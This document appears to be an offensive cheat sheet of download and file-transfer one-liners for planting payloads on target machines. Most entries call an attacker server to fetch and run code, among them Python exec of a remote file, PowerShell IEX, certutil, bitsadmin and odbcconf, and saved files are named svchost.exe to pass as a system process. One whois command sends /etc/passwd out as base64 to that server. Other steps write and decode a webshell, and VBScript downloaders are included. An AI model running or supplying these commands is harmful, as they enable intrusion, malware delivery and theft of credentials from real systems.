Python

Server (Python2):
python2 -m SimpleHTTPServer 443
Server (Python3):
python3 -m http.server 443
FTP (pyftpdlib):
python3 -m pyftpdlib -p 443
SMB (impacket):
python3 impacket-smbserver.py files . -port 443
Download (Python2):
python2 -c "import urllib2; exec urllib2.urlopen('http://207.46.13.150:443/test.exe').read()"
Download (Python3):
python3 -c "import urllib.request as u; exec(u.urlopen('http://207.46.13.150:443/test.exe').read())"

PHP:

php 5.4+ http:
php -S 0.0.0.0:443

Ruby:

ruby http:
ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 443, :DocumentRoot => Dir.pwd).start'
ruby 1.9.2+ http:
ruby -run -e httpd . -p 443 --bind-address 0.0.0.0

Busybox:

busybox httpd:
busybox httpd -f -p 443

PowerShell:

PowerShell - IWR:
powershell.exe -Command "Invoke-WebRequest -Uri http://207.46.13.150:443/test.exe -OutFile svchost.exe"
PowerShell - IEX:
powershell.exe -Command "IEX(New-Object Net.WebClient).DownloadFile('http://207.46.13.150:443/test.exe', 'svchost.exe')"

Certutil:

Certutil:
certutil.exe -urlcache -split -f http://207.46.13.150:443/test.exe svchost.exe

Smb IPC$:

copy:
copy \\207.46.13.150\users\public\test.exe c:\users\public\svchost.exe

Linux Download:

Wget:
wget http://207.46.13.150:443/test.exe -O svchost.exe
Curl:
curl http://207.46.13.150:443/test.exe -o svchost.exe
whois:
whois -h 207.46.13.150 -p 443 `cat /etc/passwd | base64`
nc -lvvp 443 | sed "s/ //g" | base64 -d

Windows Download:

Windows Bitsadmin:
bitsadmin /rawreturn /transfer down "http://207.46.13.150:443/test.exe" c:\\svchost.exe
CertReq.exe download:
CertReq -Post -config http://207.46.13.150:443/ c:\windows\win.ini output.txt
CertReq.exe upload (the response is shown in the terminal):
CertReq -Post -config http://207.46.13.150:443/ c:\windows\win.ini
Windows echo (write a base64 + URL-encoded webshell, then decode it with CertUtil):
# Write:
echo%20<base64 + URL-encoded webshell>%20>webshell.jsp
# Decode with CertUtil:
CertUtil -decode <Base64-encoded file name (may include a path)> <decoded output file name (may include a path)>
# Note: the CertUtil output file name must not be the same as an existing file
Windows VBScript (wget.vbs):
' Argument 0 is the URL, argument 1 is the output file name
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET",LCase(WScript.Arguments(0)),0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3 ' read/write
sGet.Type = 1 ' binary
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile LCase(WScript.Arguments(1)),2 ' 2 = overwrite an existing file

Usage: save the content above as wget.vbs
cscript wget.vbs http://207.46.13.150:443/test.exe svchost.exe
Windows VBS downloader:
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://192.168.3.39:4433/hashes.txt",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3 ' read/write
sGet.Type = 1 ' binary
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "C:\hash.txt",2 ' 2 = overwrite an existing file

Usage: down.vbs | cscript down.vbs
Windows PowerShell:
powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString('http://207.46.13.150:443/payload.ps1')
Windows odbcconf (runs a DLL that contains special functionality; the DLL file does not need a .dll extension and can be downloaded via UNC/WebDAV):
odbcconf /s /a {regsvr \\207.46.13.150\folder\payload_dll.txt}

Reference: File Download Generator: https://file-downloads.com/

From: File-Download-Generator